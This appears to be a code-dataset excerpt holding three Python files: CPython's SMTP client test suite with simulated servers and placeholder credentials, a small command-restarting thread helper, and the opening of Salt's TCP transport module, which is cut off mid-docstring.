source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_smtplib.py
|
import asyncore
import email.mime.text
import email.utils
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertTrue(mock_socket.getdefaulttimeout() is None)
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(smtp.sock.gettimeout() is None)
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'Ok')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'Ok')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testNotImplemented(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'Error: command "EHLO" not implemented')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testVRFY(self):
# VRFY isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'Error: command "VRFY" not implemented')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Error: command "HELP" not implemented')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
def tearDown(self):
smtplib.socket = socket
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises socket.error
self.assertRaises(mock_socket.error, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(mock_socket.error, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_password = 'C29TZXBHC3N3B3JK'
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
if arg.strip().lower()=='cram-md5':
self.push('334 {}'.format(sim_cram_md5_challenge))
return
mech, auth = arg.split()
mech = mech.lower()
if mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
if mech == 'plain' and auth==sim_auth_credentials['plain']:
self.push('235 plain auth ok')
elif mech=='login' and auth==sim_auth_credentials['login']:
self.push('334 Password:')
else:
self.push('550 No access for you!')
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(self._extra_features,
self, conn, addr)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(email)),
"ascii"))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
expected_auth_ok = (235, b'plain auth ok')
self.assertEqual(smtp.login(sim_auth[0], sim_auth[1]), expected_auth_ok)
smtp.close()
# SimSMTPChannel doesn't fully support LOGIN or CRAM-MD5 auth because they
# require a synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_login_password, str(err))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_credentials['cram-md5'], str(err))
smtp.close()
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests)
if __name__ == '__main__':
test_main()
|
__init__.py
|
"""restartsh - """
__version__ = '0.1.0'
__author__ = 'fx-kirin <fx.kirin@gmail.com>'
__all__ = []
import logging
import threading
import time
import delegator
logger = logging.getLogger('restartsh')
def restart_thread(cmd, flag, interval=0):
while not flag.is_set():
logger.info('Start [CMD]:%s', cmd)
result = delegator.run(cmd)
logger.info('Finished [CMD]:%s', cmd)
if result.ok:
logger.info('[OUT]%s', result.out)
else:
logger.error('[ERR]%s', result.err)
if (interval > 0):
logger.info('Sleep %d sec [CMD]', interval)
time.sleep(interval)
logger.info("Close by exit_flag")
def restarter(cmd, interval=0):
flag = threading.Event()
thread = threading.Thread(target=restart_thread, args=(cmd, flag, interval))
thread.daemon = True
thread.start()
thread.exit_flag = flag
return thread
|
tcp.py
|
# -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import os
import socket
import sys
import time
import threading
import traceback
import weakref
# Import Salt Libs
import salt.crypt
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.ext.six.moves import queue # pylint: disable=import-error
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
import tornado.iostream
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
'''
Ensure that TCP keepalives are set for the socket.
'''
if hasattr(socket, 'SO_KEEPALIVE'):
if opts.get('tcp_keepalive', False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, 'SOL_TCP'):
if hasattr(socket, 'TCP_KEEPIDLE'):
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE,
int(tcp_keepalive_idle))
if hasattr(socket, 'TCP_KEEPCNT'):
tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT,
int(tcp_keepalive_cnt))
if hasattr(socket, 'TCP_KEEPINTVL'):
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl))
if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
1, int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000)))
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
'''
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
